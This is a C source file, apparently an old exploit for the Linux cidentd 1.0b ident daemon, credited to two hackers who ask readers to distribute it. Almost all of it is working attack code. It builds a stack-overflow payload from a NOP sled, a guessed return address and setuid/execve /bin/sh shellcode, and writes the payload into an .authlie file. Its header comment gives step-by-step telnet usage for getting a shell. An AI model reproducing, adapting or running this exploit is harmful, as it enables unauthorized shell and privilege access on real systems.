/*  linux cidentd 1.0b exploit I
 *  By Jackal (jackal@hack.gr) & mastoras (mastoras@hack.gr)
 *
 *  Greetz to:
 *  KoD, DiJ, m0nty, Synner, Egofan, guys at #grhack & users of hack.gr
 * 
 *  Compile it and run it in your $HOME directory. It should creat()
 *  an .authlie file. Then e.x. "telnet localhost 110", find your port
 *  by using netstat(8), "telnet localhost 113", give the ports and
 *  you're done. (test it with "id;")
 *
 *  Some code is of course stolen.
 *
 *  Oh, please distribute this :-p
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE            1060
#define NOP                            0x90

char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;
    int fd;

    if (argc > 1)
	bsize = atoi(argv[1]);
    if (argc > 2)
	offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
	printf("Can't allocate memory.\n");
	exit(0);
    }
    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);

    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
	*(addr_ptr++) = addr;

    for (i = 0; i < bsize / 2; i++)
	buff[i] = NOP;

    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
	*(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    fd = creat(".authlie", 0644);
    write(fd, buff, bsize);
    close(fd);
}